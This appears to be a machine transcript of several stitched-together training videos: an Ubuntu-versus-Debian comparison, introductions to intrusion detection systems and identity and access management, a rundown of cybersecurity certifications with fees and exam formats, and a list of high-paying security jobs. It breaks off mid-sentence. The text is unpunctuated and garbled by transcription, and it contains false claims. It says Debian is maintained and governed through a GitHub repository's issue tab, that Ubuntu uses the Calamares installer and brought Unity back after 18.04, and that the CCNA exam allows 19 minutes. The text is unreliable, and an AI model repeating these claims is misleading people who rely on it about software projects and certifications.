Ubuntu as well with unity as its Flagship environment Debian on the other hand is a free operating system for your computer which started in 1996 and is maintained by global contributors if the operating system a set of basic programs and utilities that make your computer run its core is the kernel the kernel is the most fundamental program on the computer Debian uses the Linux kernel a completely free piece of software which was started by liner strovals and supported by thousands of programmers worldwide a large part of the basic tools that fill out the operating system come from the gnu project and those rules are free as well Debian is the mother of Linux distributions beginners always wonder why this not so good looking distro is so popular inside the Linux developers Community especially when there are a lot of modern distributions that are easy to use and have beautiful UI later on they found out the power of Debian after using a bunch of distributions from other developers you'll be surprised to know that almost all other popular consumer level distros are based on Debian even Ubuntu it is so stable and feature-rich that the developers find it easy to build their distros based on Debian rather than building it from scratch Debian is run and maintained on its GitHub repository thanks to contributions from developers worldwide the major decisions are taken up on the repository issue tab leading to community-wide feedback and holistic approach to open source development of the Debian operating system thanks to this variety of personnel the source code of Debian comprises around 70 different programming and scripting languages Debian supports all kinds of graphical environments ranging from full feature desktop environments to lighter Alternatives and email minimalist window managers Ubuntu ships with unity desktop by default where the package manager can install The Gnome environment if needed while also including cinnamon ldxd xfc KDE and mate on the other hand Debian gives you the choice of choosing which desktop environment you want from the get-go by providing ISO files for each desktop environment individually now that we understand where both these operating systems stand let us take a look at some of the best features offered by each of these distributions Ubuntu is the closest thing to a household name among desktop Linux distributions it is a great distribution to start with and it's even a great distribution to keep using after you're more experienced if you're happy with it it is user friendly in a lot of ways it provides a simple desktop has an easy installer and provides a checkbox during the installation process that will automatically install Flash plugins and various codecs that you will need for multimedia support there's an additional drivers tool that will detect closed Source or proprietary drivers that might be necessary to get all your Hardware working and easily install them for you Ubuntu is produced by canonical and their friends it is run as an open project to enable others with diverse ideas to benefit from all the work the developers do to deliver the world's best open platform still canonical is responsible for delivering six monthly Milestone releases and regular LTS releases from Enterprise production use Enterprises can count on canonical to support secure and manage Ubuntu infrastructure and devices with more than 500 employees in over 39 countries the company underpins a critical infrastructure for thousands of businesses and millions of Ubuntu users around the world all right Unity desktop was originally developed by canonical and introduced earlier for Netbook computers with Ubuntu 10.10 then it went on to be the default desktop environment for Ubuntu eventually it has been dropped by canonical and replaced by gnome however it has made a comeback after Ubuntu 18.04 while being completely stable the HUD and Global menu hold up just fine with major applications such as Library office Thunderbird and other web browsers that means that the unity desktop works as it is supposed to while making you more productive but some desktop environments have a steep learning curve Unity is very intuitive for new users in spite of deviating from the traditional start menu format that the windows users are generally accustomed to the calamaris installer is a framework by design it is very customizable in order to satisfy a wide variety of needs and use cases calamaris aims to be easy usable beautiful pragmatic and more importantly distribution agnostic calamaris includes an advanced partitioning feature as well which supports for both manual and automated partitioning operations it is the first installer with an automated replace partition option which makes it easy to reuse a partition over and over for distribution testing coming to Debian it is a community distribution through and through it's governed by a board of elected developers it has its own internal structure and laws and just about everyone working on it is a volunteer making it completely Community Driven it is maintained and developed by programmers and developers all around the world this form of development ensures continuity if one of the developers decides to stop working on the project another developer might come in and take place and keep the project going on it is completely free of centralized control and this is also one of the reasons for an undecided stable release cycle Debian Sid is the permanently unstable development version of Debian it's where the latest versions of programs are being considered for inclusion in the Debian release cycle are uploaded and tested because it has no official installed media and the few net boot images that are built often don't work even people who are willing to risk using a development version may have trouble installing it however it Still Remains the best place to test new features that have not yet made their way onto the stable branch Debian has only free and open source software and its repositories this is mostly ample for our users except for users who use Hardware that only has proprietary drivers these repositories work well in most cases is possible to add other reports as well that have proprietary software if that is the requirement Debian Standard Version is very stable as software and libraries in it go through rigorous testing the stability makes Debian a perfect server OS and it's also the same reason why average user shy away from using Debian as their primary OS on desktop this is also one of the reasons why many developers use Debian as a base for the derivative one of which is also Ubuntu now that we are aware of each distribution's unique features let's take a look at how we can go ahead and install these operating systems and where we can get the downloadable images when it comes to Ubuntu Ubuntu has dropped the support for 32-bit systems currently it supports only 64-bit devices and arm devices installation is easy with the calamaris framework coming into ioso pre-default and the latest ISO can be downloaded from the link being shown on the screen right now in the case of Debian the support for multiple range of devices is still present that can also include 32-bit systems and other smaller devices which are not modern even though it does not use the calamaris installer even downloading the ISO file can be a bit hectic for newer users considering this is a distribution aimed at developers and intermediate users finding the right link can be difficult because of which we have mentioned the link on the screen below where we can get the latest ISO depending on which desktop environment you choose to go with with the installation out of the way let's take a direct comparison of the features between both Ubuntu and Debian Debian is a Community Driven open source Linux distribution and is primarily aimed to be robust capable and most importantly free on the other hand Ubuntu is also and free on open source like Debian but it's backed up and developed by a canonical which is a corporate company Debian and Ubuntu are both fundamentally fast regarding performance as Debian comes bare minimum and is not bundled or pre-packed with additional software and features it makes it super fast and lightweight at least when compared with Ubuntu directly both Ubuntu and Debian use the same apt software packaging management system but provide a different software Repository Debian is more like promoting freedom of choosing free software thus it does not include any proprietary software by default you can always install the paid versions but you have to enable it manually Ubuntu focus on usability including all the software including free paid open source closed Source Etc Ubuntu also introduced a universal packet management system called Snap it will be used across distros and thus prevent more distro based software fragmentations as the Debian destroy does not contain any proprietary blobs there might be some problems with drivers and firmware that means Debian lacks some of the essential proprietary firmware by default but the users can enable the repository and install it manually like other paid software on the other hand Ubuntu does not care how much whether it's paid free open source or clone source so it includes as many drivers and firmware as possible Ubuntu also lets you install and configure the necessary drivers and firmware automatically during installation or afterward if you are a gamer then you will probably be concerned with the latest software drivers and Hardware support while Debian can potentially provide that it is likely that you might end up breaking your installation as mentioned before Ubuntu supports certain proprietary packages as well which often consist of graphic drivers which are essential to gaming Debian focuses on the open source aspect of the software hence it can be a well-known fact that with Gamers Ubuntu and some other distributions like pop OS have been working much better regarding both software and Hardware support regarding the audience they cater to both Ubuntu and Debian have their pros and cons Ubuntu is a very good distribution for amateur users with little to no experience and if they want to have the latest versions of packages and applications at all times on their systems it is also for users who do not want a lot of customizability in spite of unity being very customizable desktop environment it is also perfect for users with newer Hardware since it comes updated with all the latest graphical devices and their respective drivers Debian on the other hand is Catered towards a little bit of experienced users who can fix some minor bugs on their own or with minimal Community Support it also is for users who want to support an open source approach rather than an operating system which is devoid of any contribution from other end and is primarily backed by a corporation it also doesn't favor gaming since it does not guarantee compatibility with all the newest graphic cards or even Wi-Fi cards in some cases however due to the low memory overhead Debian is very useful for people who are looking to run home servers or even corporate environments where running servers on Debian will provide much more use data protection is of Paramount importance in today's world the vast amount of data flow between corporations and consumer needs to be secured considering that they are entrusted with a lot of belief a company can spend millions of dollars on the most secure servers but it takes a single hacker to ruin all the Goodwill between the organizations to prevent these malicious attacks many automated security systems have been developed but none of them have been as used as IDs platforms which are also known as intuition detection systems welcome to this introductory lesson on intrusion detection systems so let's go through the topics that we are going to cover today we started the basic definition of ideas from a Layman's perspective and moving on we cover the multiple types of intruders that seek to access confidential information without any authorization next we cover the basic ways to detect intrusion signatures from the perspective of a network administrator but then take a look at the different types of idea systems that can be used in corporate environments today a small explanation of the two types of protection is Then followed by an introduction to some of the most well-known IDs tools on the market so let's get started with what is an IDs an intrusion detection system is an app or device that monitors inbound and outward Network traffic continuously analyzing for activity changes and patterns and alerts an administrator when it detects unusual behavior an administrator then reviews alarms and take action to remove the threat for example an IDs might inspect the data carried by Network traffic to see if it contains node malware or other malicious content if it detects this type of threat it sends an alert to your security team so they can investigate and remediate it once your team receives the alert they must act quickly to prevent an attack from taking over the system to ensure that the IDS doesn't slow down Network performance the solutions often use the switched Port analyzer or a text access port to analyze a copy of the inline data traffic so that they do not meddle with the actual traffic however they do not block threat once they enter the network as intrusion prevention systems do regardless of whether you set up a physical device or an IDs program the system can recognize attack patterns with network packets monitor user Behavior identify abnormal network activity or ensure user and system activity do not go against security policies the main goal of an IDs is to detect the anomalies before the hackers complete their objective once the system detects a threat the IT team is informed and the information is passed on given the requirement for understanding context an Enterprise has to be ready to make any ideas fit its own unique needs expert advice what this means is that an ideas cannot be a one-size-fits-all configuration to operate accurately and effectively and this requires a Savvy ideas analyst to tailor the ideas for the interests and needs of a given site and knowledgeable train system analysts ask cash the trick with ideas is that you have to know what the attack is to be able to identify it the ideas has always had the patient zero problem you have to have found someone who got sick and died before you can identify it it can usually go for two types of protection active protection and passive in a passive system the ideas detects a potential security breach locks the information and signals an alert in a reactive system or an active system the IDS responds to the suspicious activity by logging off a user or by reprogramming the firewall to block Network traffic from the suspected malicious source so now that we understand what an IDs is let us go through the different types of intruders IDs platforms must be aware of to understand this type of intruders let us go through a scenario we have the servers which are protected by the IDS Platforms in place so let's say a hacker tries to breach the system from outside the organization this can be done using multiple attacks like DDOS attacks injection attacks Etc the category of individuals that are not authorized to use the system but still exploit users privacy and confidential information using different techniques are known as masqueraders a mass Creator is an intruder that is an outsider who does not have direct access to the system and aims to attack unethically by stealing data or information however there is another Intruder who is theoretically harder to detect and uproot than a masquerader these are the people within the organization who want to weaken the security defenses beat for corporate Espionage or to Aid other masqueraders the category of individuals that are authorized to use a system but misuse the granted access and privilege these are individuals that take undue advantage of the permissions and give access to them and this category of intruders are known as misfiza esars are people that are insiders and have direct access to the system which they aim to attack unethically by stealing data or information let us now go through some of the ways the ideas platforms can detect intrusion before it is too late intrusion detection systems primarily use two key methods one is signature based intrusion and the anomaly based intuition signature based intuition detection is designed to detect possible threats by comparing the given Network traffic and log data to existing attack patterns these patterns are called sequences and could include byte sequence which is also known as malicious instruction sequences signature based detection enables you to accurately detect and identify possible lunar tags a normally based intrusion detection is the opposite it's designed to pinpoint unknown attacks such as new malware and adapt to them on the Fly using machine learning machine learning techniques enable an intrusion detection system to create baselines of trustworthy activity which is known as a trust model then compare new behaviors to verified trust models false alarms can occur when using an anomaly based ideas since previously unknown yet legitimate Network traffic could be falsely identified as malicious activity now if you combine both of those you have the hybrid intuition detection they use signature based and anomaly based intuition detection to increase the scope of your ideas this enables you to identify as many threats as possible a comprehensive intrusion detection system can understand the evasion technique cyber criminals use to trick in ideas to thinking there isn't an attack taking place these techniques could include fragmentation low bandwidth attack pattern change evasion and many more you can now take a look at the type of protection offered by IDs platforms there are a couple of ways that can be set up so let's go through each method the first is a network based ideas the sensors are deployed at strategic points within the network such as within the DMZ or at the networks perimeter the sensor can monitor individual packets of inbound and outbound traffic to and from all devices on the network it analyzes them for malicious activity and depending on the network architecture and amount of traffic involved multiple instances of network-based ideas may be necessary the second category is host based intrusion detection systems or HIDs an agent runs on all servers endpoints and devices in the network that have access to both the internet and the internal Network inclusions identified by analyzing operating specific activities like the modification of the file system registry or Access Control lists and by monitoring system application logs as well the augment network based idea systems by detecting anomalous traffic which originated within the organization or from the host that is being monitored for example a host infected with malware that is attempting to spread it to other internal hosts is an issue that a network-based ideas could potentially fail to detect the third variant is a cloud-based intuition detection system because of the internet facing nature of the cloud on-premises idea Solutions are not necessarily optimized for monitoring for example network based sensors need to be deployed within the cloud at an environment's Network perimeter and get a cloud service provider may or may not have a way to facilitate this cloud-based servers use purpose-built cloud sensors that use cloud service provider application programming interface or cloud service provider apis to get as much visibility as possible into your Cloud environment now that we understand the different types of IDs deployment tactics let us go through some tools that excel in this field offering top of the line implementations in a corporate and consumer environment the first tool being covered is the solar wind security event manager the Solomon security event manager is designed to integrate real-time log data from across your infrastructure enabling it to act both as a network-based idea system and a host based idea system the solution can let you discover all kinds of malicious attacks and help you protect your network from home it is also designed to enact both signature based and anomaly-based intuition detection by comparing sequences of network traffic against a set of customizable rules next we have the McAfee livesafe McAfee livesafe is an intrusion detection system designed to bring a real-time threat awareness to your physical and virtual Networks it uses signature based intuition prevention and anomaly-based inclusion detection along with emulation techniques to spot and identify malicious activity McAfee is also built to correlate threat activity with application usage which can further prevent network issues stemming from cyber attacks next we have lumira Romero is a security information and event management platform built to enact trade detection and responses across your cloud and on-premises environments it is designed to continuously monitor your I.T infrastructure for suspicious activity and misconfigurations both of which could result in data leaks and compliance breaches it enables you to respond to an attack in progress and stop malicious actors in their tracks monitoring usage of corporate data and access to privileged information had been a daunting task before the Advent of IAM encompassing numerous apis single sign-on Frameworks and data handling policies IEM has established itself as a key component of every it Department but how does it enforce these rules and what are the key benefactors of these policies what about the advantages of these Frameworks and the workflow of these systems we are here today to answer these questions let's take a look at some of the topics to be covered today we start by learning about IAM that is identity and access management from a surface level so as to put a clear idea of what it is next we cover the general workflow and process of how IAM works moving on we cover some of the tools that find the place in an IAM framework and are crucial components finally we go through some of the advantages of the IAM learning what makes them a lucrative deal for organizations so let's get started by learning about IAM from a surface level perspective identity and access management or IAM is a set of processes policies and tools for defining and managing the roles and accessibility of individual Network entities to a variety of cloud and on-premise applications the users can include customers Partners employees devices like computers smartphones routers Etc the core objective of IIM systems is one digital identity per individual or item once a digital identity has been established it must be maintained modified and monitored throughout each users or devices access lifecycle access and user are two vital IAM Concepts access refers to the actions permitted to be done by a user like view create or change a file users could be employees Partners suppliers contractors or even customers furthermore employees can be further segmented based on their roles IEM systems are designed to perform three key tasks identify authenticate and authorize meaning that only the right person should have access to computers Hardware software apps any it resources Etc to the entry of new users or the changing of the rules of existing users the list of access privileges must be up to date all the time IM functions usually fall under it departments or section that handle cyber security and data management now that we understand the importance of IEM in today's cyber security sphere let us understand the process of this framework you have multiple components that Aid this process let's start by going through each of them individually principle is an entity that can perform actions on an AWS resource or any Cloud management system a user a role or an application can be a principle it's always the principle who raises a concern to access or modify data on servers serving as the first point of contact in the IM workflow authentication is the process of confirming the identity of the principle trying to access the product the principle must provides its credentials or required keys for Authentication this step can be further enhanced by multiple authentication factors and geologs among other things once the identity is confirmed the principal has the ability to view the data behind the wall of security take the necessary steps when it comes to requests a principle then sends a request to the cloud management system specifying the action and which resource should perform it in this step the user can ask to modify delete edit or affect other users in this particular Market of organization by changing the data or the information when it comes to authorization it carries out the rest of an organization identity and access management processes once the user has been authenticated users are granted authorizations according to their role at an organization the practice is referred to as the role-based access control or rpec authorizations determine a Rule's resources and level of access in the network these items may include systems applications file shares printers and more for example an accountant Department employee who regularly works with payroll software must be authorized to do such if authentication resembles a passport these are the things your digital identity can access with it well authentication is fully straightforward authorizations and their management are far more challenging authorizations consist of complex set of rules and policies and groups which are permitted explicitly configured per user account with the working of IM Frameworks out of the way let's cover some of the tools that these systems work on SSO is an im2 that enables a user to log into one and organization's properties and automatically be logged into a design set of other properties for example when you log into Google you automatically logged into your Gmail and your YouTube accounts similarly for users single sign-on reduces fiction since they don't have to keep track of different credentials for every application for organizations SSO helps in collecting valuable insights about user behavior and preferences since it attacks them as they move from one application to another connected by one single login next is multi-factor authentication or MFA implementing multi-factor authentication is crucial to protect your organization's data from malicious intrusions and virtually every IM platform offers some form of MFA however it's equally crucial to customize MFA with the appropriate level of security for example in business to Consumer scenarios you need to consider ux and try not to create unnecessary friction for users who don't want to be subjected to heightened scrutiny every time they log in for Workforce IM you may want a more stringent MFA since the consequences of an unauthorized party gaining access to your private Network can be so devastating a modern IM solution will allow you to implement MFA only when it's needed this can be accomplished to set up authentication or adaptive authentication in which users only trigger MFA if they are trying to access sensitive data or their behavior is flagged as risky in the past few years identity has become the preferred Gateway for hackers to break into systems Brute Force attacks credential stuffing attacks and even highly targeted fishing campaigns are all advanced by hackers to break in through a company's front door which is the login box there are multiple ways IM systems can help detect and mitigate these malicious attacks IM solutions to Tech attacks by monitoring signals such as the velocity of traffic detection of login patterns that they perform a user's routine use of a breached password use of devices and IP addresses with a poor reputation among other things these are some of the most widely used tools when it comes to IM Frameworks but why do we go through setting up so many tools and firewalls let's go to some of the advantages of using IM systems in both corporate and consumer environments IM solution helps identify and mitigate security risks you can use IM to identify policy violations or remove inappropriate access privileges without having to search through multiple distributed systems we can also leverage IIM to ensure that security measures are in place to meet Regulatory and auditing requirements IM provides a common platform for Access and identity management information you can apply the same security policies across all the operating systems and devices used by the organization the IM framework can help you enforce policies related to user authentication Privileges and validation and attend to the privileged creep problems IM simplify sign up and user management processes for application owners end users and system administrators it makes it simple to provide and manage access it promotes user satisfaction IM Services can also lower operating costs using Federated identity Services means you no longer need local identities for external users this makes application Administration easier cloud-based IM Services can reduce the need to buy and maintain on-premise infrastructure so importance of a cyber security certification first and foremost when I see a certification I look at it from three different aspects the first is the training itself which allows me to gain the knowledge which allows me to understand the aspects of security or whatever certification is there for the second aspect is the exam itself how do I need to prepare myself for the exam and how do I need to approach the exam how do I need to ensure that I pass in my first attempt and the third aspect is the certification itself which allows me to be eligible to apply for a particular job role so obtaining a cyber security certification ensures or shows uh to the organization that you're applying to that you do have the prerequisite knowledge and you should be shortlisted for an interview the knowledge that you have gained during the training will help you when you attend that interview and when you attempt to answer the questions asked to you so these certifications are designed for a specific rule uh for example a forensic investigation certificate will teach you how to investigate a crime scene forensically a digital crime scene for a matter of fact a certified ethical hacking course will teach you about penetration testing so it is you who's going to decide which certification you require and then attempt get certified on it of course a fresher with a cyber security certification will have better employment opportunities because they can showcase their knowledge with the certification that they already have even professionals who want to enhance their careers can get into manageable or Advanced certifications to improve on their knowledge and get promoted in their job profiles so cyber security credential certifications can be classified in three different aspects the first one being the foundational level then the managerial level and the advanced level in the previous video we just had a small overview here we are going to discuss about what the certification covers how the exams are conducted and the price points for each and every exam so let's start with the foundational certifications we start off with CCNA which is the basic certification for networking so the CCNA routing and switching certification basically it helps you build your networking career you will join an organization as a networking engineer where you can a Health Organization establish the routing uh the pathing of how data package will travel across the network this certification covers all the basic concepts that you would require to understand networking the basic requirements for this certification are that the candidate must have a bachelor's degree but apart from that there are no other prerequisites so it's just that you need a bachelor's degree and then you can apply uh you can study for this you can undergo a training and then you can attempt the exam the certification provider obviously is Cisco so the knowledge that is limited to this training and certification is for Cisco devices only the exam fees for this certification is approximately 325 dollars the exam when it is conducted it has around 50 to 60 odd questions which need to be answered in 19 minutes the type of questions that you are going to get it is multiple choice questions where you have a question and four answers and you have to choose the correct answers among those drag and drop where you have to click on an object and drag it to its appropriate Place probably a architectural diagram and you have to let's say pick on a router and place it into a particular position if you place it correctly you answer the answer the question correctly otherwise it's wrong and a simulator where you go where there could be a configuration you need to configure it in a particular Manner and then check whether the configuration is correct or not the pass Mark is around 800 to 850 out of a possible thousand marks so each question will have a different weightage depending on the depth of the question depending on the difficult level of the question or the difficulty level of the question which would then count towards your marks and if you score 800 to 850 that's when you clear the exam the job rules as we have discussed over here would be more more on the network administrator side or a network engineer side depending on the level of experience that you have this salaries that are expected from these job rules in the U.S around fifty five thousand dollars to ninety thousand dollars annually the next one is the CompTIA certification called Security Plus compute is also a global certification Authority for uh infosec courses so this certification teaches candidates on how to secure applications networks and devices it focuses on Hands-On practical skills in the field of network security I have trained people on this certification myself so I know this certification is quite Hands-On it deals with the concepts to the core it helps you understand the concepts and then in the Practical Hands-On demo you need to execute the Practical yourself so that you can gain that knowledge the recommended level for a candidate to attempt this training would be at least around two years of experience in the it sector in addition if you have already been certified for Network plus certification from comchia which is the Baseline networking certification this is also a preferred way to go for this certification as said comcha is the certificate provider and the exam fees for this certification is 339 dollars the exam is quite simple 90 questions in 90 minutes that's one minute per question it sounds like a lot of time but believe me the questions can be a little bit confusing can be a little bit lengthy so you will require all those 90 minutes to answer those questions especially when they're tricky and they're technical in nature the questions would be multiple choice and Performance Based the pass Mark for this exam is around 750 points out of a possible 900. the job profiles for this kind of certification is when you want to apply for a security analyst position or a security Engineers position where you're going to analyze some data to understand and figure out what problems are ongoing in the organization uh the average annual salary of this person would be around 72 000 then comes the ceh or the certified ethical hacker training from EC come chill now this is a very well known course and also uh PC council is a global certifying Authority very well accepted across a lot of countries this is an offensive certification so here you're basically trying to become a penetration tester you're taught how to hack you're taught how to attack a particular organization from an ethical hackers perspective so the job profiles that you'll be looking here are of a pen tester where you go into an organization you test their security controls or you'll test their devices find out flaws within them and then provide recommendations of how to plug those flaws or mitigate those flaws and improve the security of that organization it is recommended that you have two years of experience at least in networking or security for these uh to attempt this kind of trainings and certifications again a basic understanding of networking or maybe a little bit of applications operating systems would be necessary uh before attempting this certification the certification provider is easy Council and the exam fees for this certification is 500 so the exam here would be 125 questions which needs to be attempted in four hours and and you will only get multiple choice questions in here now for CH there are two exams one is the multiple choice questions and the second is a practical exam where you need to solve some given problems to you in an iLab scenario and if you are able to solve them properly you then get certified for CH practical the cutoff varies from 65 to 85 percent depending on the questions that you have answered and the weightage associated with each and every question as said the job roles would be as a penetration tester a security engineer and your salaries would start from around 90 000 annually then comes the CND or the certified Network Defender also from Easy Council now this is more on the network defense side so here again the job rules would be where you are where there's a network that you have and you're going to try to secure the network and the communications that are going to travel over the network so you need to be a network administrator a network security engineer or as uh in a similar profile to understand how networks work and then you're going to attempt to secure those networks the certificate provides wider again is easy Council and this certification is placed a little bit below ceh so it becomes Network defense then CH where you're going to become a penetration Tester the exam fees for this certification is 350 US dollars for exam the exam is of 100 questions to be answered in four hours again it's just a multiple choice questions so you get a question with four options you answer the correct one and you move on to the next question the past percentage against varies from 60 to 85 percent depending on the questions answered and the weightage of that question job rules to be applied Network defense technician CND analyst or a security analyst from a network perspective salaries would range from 65 000 to 75 000 per annum then comes the forensic investigator course which is exactly what it is digital forensic investigator this will help you understand how computers work where data is stored and how you can retrieve that data to investigate a crime that has taken place so the candidate must have at least two years of experience in the information security sector they need a good understanding of how networks work how computers work how operating systems work how they store data the location where that data is stored how databases work how those databases store those data and so on so forth this certification is sought after mainly in the law enforcement areas but there are a few corporates that offer forensic investigation as a service especially when a corporate gets compromised and they want to conduct their own investigations the certification provider for this is also EC Council and the exam fees are 500 this is an advanced level certification so understanding of applications networks and operating systems is a must before you attend this the exam is quite similar 150 questions in four hours again it's just a multiple choice question exam the cutoff again is from 60 to 85 percent depending on the questions and the weightage of each and every question job rules it security Specialists network security pro the job rules foreign investigators law enforcement agencies security Specialists homeland security jobs annual salaries would be around 88 000 and above all right now let's talk about the managerial level certifications kobit stands for control objectives for information and related Technologies it's a certification that will give a candidate and in-depth knowledge of the framework which kobit is all about and the framework helps you manage and govern Enterprise ID environments now this is Advanced certification so around eight years of manageable experiences suggested before you attempt the kobit 5 certification to understand all the aspects and to help you implement the framework properly the certification certificate provider is isaka the exam fee is around 175 dollars now this is a small exam 50 questions but in 40 minutes so you really have to be on your toes you have to know the knowledge that is very limited time to think and you have to be fast in your answers the past percentage is 50 the job roles associated with this certification would be to when you apply for information security manager or as a security consultant or a cyber security manager and your roles and responsibilities would be the governed an I.T space that the organization owns so all the servers desktops the network the data flows the databases everything and how it needs to be managed and how it needs to be governed in a secure manner annual salaries would be around a hundred thousand dollars plus then the cism also called as system it stands for certified information security manager and as the name suggests it's a security manager certification it helps the candidate in understanding the relationship between business goals and information security so now you're going into the space where you're not only technical in nature but you also have to understand the business needs the goals of the business and you have to align the information security of your infrastructure along with the business needs and the business goals so it is your inputs that are going to go to the management to see if the infrastructure is aligned to the business goals or if the infrastructure or the business goals need any fine tuning around five years of work experience is recommended in the information security field for attempting the cism out of the five years the candidate must have a background as an information security manager for three years so you have some experience as a manager you have implemented those things yourselves which will give you a better understanding and then you attempt the certification again providing by isaka and the exam fees for isaka members is 575 dollars for non-members it is 760 dollars the exam is where you have to answer 150 questions in four hours quite a bit of time but questions are going to be a scenario based questions where they're going to give you a lot of scenarios you have to think about it and you have to give the most probable and the correct answer for that particular scenario the past Mark is 450 out of 800. your job profiles should be be either a risk manager or a risk consultant analyzing the business requirements to the infrastructure security that that you have and to identify if there any risks associated with the infrastructure highlight those risks and then put in security controls and manage those controls in a way where security is mitigated your average salaries would be around 88 000 and above then the sisa or the cisa the certified Information Systems auditor certification it not only looks into security but it also looks into auditing and controls in Information Systems this is a highly reputed certificate and you gain a better understanding of governance regulations and auditing your information landscape again a minimum of five years of work work experience in the field of Information Systems auditing control or security is necessary now here the question would be what's the difference security is where your technical in nature you have done let's say a vulnerability assessment or a penetration test you have implemented firewalls you have architected security control rules are all about the security controls that you're going to implement like firewalls idss ipss data loss prevention systems maybe even utms and whatnot so experience in architecting or implementing those controls in an effective manner mitigating your security or your your vulnerabilities that you have identified in the organization and auditing would basically mean about looking at compliance to ensure that everything is in place you're compliant with let's say ISO 27001 guidelines or the policies that you have created yourself and everything is working in order so it's more of a checklist where you're going to just check everything is in place and you're conforming to standards this certification is also provided by isaka and the exam fees for isaka members of 575 dollars whereas non-isaka members will have to pay 760 dollars for the certification 150 questions again in four hours multiple choice questions scenario based cell you have to really understand this uh real world scenarios of where what controls and what audit mechanisms should be in place pass Mark is 450 out of 800. your job rules would be mainly becoming an auditor or a senior auditor or director for information security information audit manager or information technology consultant where you provide Intelligence on how the company should Implement their infrastructure average salaries would be one hundred and three thousand and above then comes the crisc also called as crisp certified in risk and information systems control certification helps the candidate design and maintain Information Systems controls for an organization this is one of the most sought after certifications as far as risk management is concerned in Europe and in U.S if you have this kind of certifications you automatically qualify for a risk manager or a security risk manager or a information security consultant kind of a role you should have a minimum of three years of experience in the field of is controls that means information security controls you should have knowledge about firewalls you should know about how to mitigate risks how to identify risks in the first place risk analysis risk management and after which you're going to implement security controls to mitigate that risk or bring it to acceptable levels at this point in time you will also be responsible to create policies revolving those risks and how you want to calculate those risks and treat those risks in their lifetime certificate provider again is the Saka 575 dollars for isaka members 760 dollars for non-isaka members for the exam fees a similar question 150 questions to be answered in four hours multiple choice based on performances so they may give you a scenario where you have to perform a risk analysis and provide a report and a solution based on your findings again the pass Mark is 450 out of 800. the job profile Associated as discussed earlier are diet risk management professionals where they're going to identify risks treat those risks calculate analyze maybe do a business impact analysis to a certain how the organization is going to be affected and then you will also be looking at compliances as far as these job roles are concerned average annual salary would be 119 000 and above moving on to advanced level certification now this is where we come across a cissp or the sisp certification certified information system security professional this is the gold standard of all certifications if you have this certificate it's you can basically be assured of a job in the IT world now just to qualify you'll have to have five years of experience in the information security field there are eight domains that are specified by cisp and you have to prove that you have knowledge and your work experience of around five years in at least two of those domains if you do not have those kind of experiences you can still attempt the exam but you become an associate of ISE Square which means that you get six years to accomplish the five years of x experience requirement for this certification before taking up the certification we suggested that the candidate clears all the intermediate level certifications not all but some of them in fact I have seen people do the other way around they qualify for cissp they give the exam once your cisp the sisa or csum CIS or cism exams are way easier to crack but you need to have that kind of experience I have seen people with 15 years of experience and more fail at this certification in the first attempt the certificate provider is IC Square the exam fees is 699 like I said this certification is most sought after the gold standard in fact there's hardly any other certifications after this that you might want to do the questions now the exam has changed if it is the English version that you're giving it's 150 questions to be answered in three hours if it is a non-english exam that you're attempting then it is 250 questions in six hours it's a marathon and if you're opting for the six hour exam you need to plan it really well it sounds really easy but the questions are quite tough they're scenario based and the answers are quite confusing as well you would get multiple choice questions you would get drag and drop and you might get simulators as well uh the pass Mark is 700 out of 1000 but each question has a different weightage so it depends on which questions are asked of you and which questions you've answered correctly the job rules associated with this certification would be anything and everything in information security at the managerial level and above so information security manager risk manager system information system security officer the CSO role the ciso Chief Information Security Officer any role that you might think of as a risk from a risk compliance strategy could be achievable after this kind of a certification the average annual salary is 108 000 for this certification technology has become more intertwined with our daily lives hence it is no surprise that the need for skill cyber Security Professionals is on the right ice cyber security is a lucrative field and there is a dearth of skilled cyber Security Experts therefore currently a career in cyber security is something you should consider if you're looking for an interesting job role on that note hey everyone welcome to yet another exciting video by simply learn which will take you through the top 10 highest paying cyber security jobs for 2022 but before we begin if you are new here and haven't subscribed already make sure to hit the Subscribe button and the bell icon for interesting Tech videos every day so let's get started at number 10 we have the job role of a cyber security analyst cyber security analysts are professionals who keep a constant check on any threat and monitor the company's Network for potential vulnerabilities they react swiftly to restore protection if compromised they identify and correct flaws uncovered in the company's applications programs Security Systems computer networks and more cyber security analysts even recommend ways to improve the businesses overall security and communicate the specific measures to be taken they compile ongoing safety reports document security issues and measures taken to resolve them now let's have a look at the salary of a cyber security analyst according to Glassdoor a cyber security analyst in the United States earns about 80 000 US dollars per annum and in India you can earn nearly 6 lakh rupees annually next on our list we have the job role of a network engineer a network engineer is a person who understands the structure and network Essentials of the entire organization at a macro level they design and maintain any network that supports the company's life cycle and growth opportunities Network Engineers take charge of the configuration and installation of network devices and services they also collaborate with the security team and ensure network security through the implementation of tools and procedures in line with them they monitor Network performance and ensure reliability and availability according to Glassdoor a network engineer in the U.S earns over 85 000 US dollars per annum and in India the average salary is 4 lakhs annually moving on the next job role on our list is that of an ethical hacker ethical hackers are Network Security Consultants who identify and exploit system vulnerabilities just like how a hacker would do they are also known as white hat hackers they scan the network and systems for vulnerabilities before a black hat hacker would ethical hackers probe and Tesla network using various penetration tools and software additionally they also design new penetration tools and document the test results according to pay scale in the US a certified ethical hacker earns around 96 000 on an annual average basis and in India they make around 5 lakh rupees per annum moving to our next job role we have malware analyst a malware analyst analyzes malicious software that includes Bots worms and Trojans to understand the nature of death threat a malware analyst has a dual mentality by being both forward-thinking and reverse thinking moving on to the responsibilities of a malware analyst firstly they use tools and expert level knowledge to help decide what kind of malware they are dissembling and if they have encountered this particular kind of malware before you will use Dynamic malware analysis tools to achieve insight into software attacks secondly they also uncover hidden indicators of compromise that should be blocked and keep an organization software updated to protect against the latest malware threats according to glassdo in the U.S a malware analyst can earn about 97 000 and the average salary for a malware analyst is around 5 lakh rupees in India up next we have another very interesting job role that is information security analyst an information security analyst is an expert who plans implements upgrades and scrutinizes security protocols to safeguard an organization's computer networks and information these professions play a vital role in the public private and non-profit business sectors because they Shield a company sensitive and fundamental information they use data encryption firewalls and other relevant security tools and applications to cover and protect transfers of secret digital information security analysts perform risk assessments Audits and tests to ensure the proper functioning of data processing activities and security measures asper glass told the national average salary of an information security analyst is around 99 000 per annum in the states and as per indeed.com in India you can earn nearly 7 lakh rupees per random let's have a look at the next highest paying cyber security jobs that is cyber security engineer a cyber security engineer helps to design and Implement methodologies to secure the organization's cyberspace they also help in testing and monitoring systems frequently to make sure that all of the systems are up to date and work perfectly to defend the information they troubleshoot security and network problems and ensure that the organization's data and infrastructure are protected by enabling the appropriate security controls cyber security Engineers also conduct tests and scans to identify any vulnerabilities in the network and system talking about the salary in the United States a cyber security engineer earns over 101 thousand dollars per annum as per pay scale the average salary for a cyber security engineer in India is nearly 7 lakh 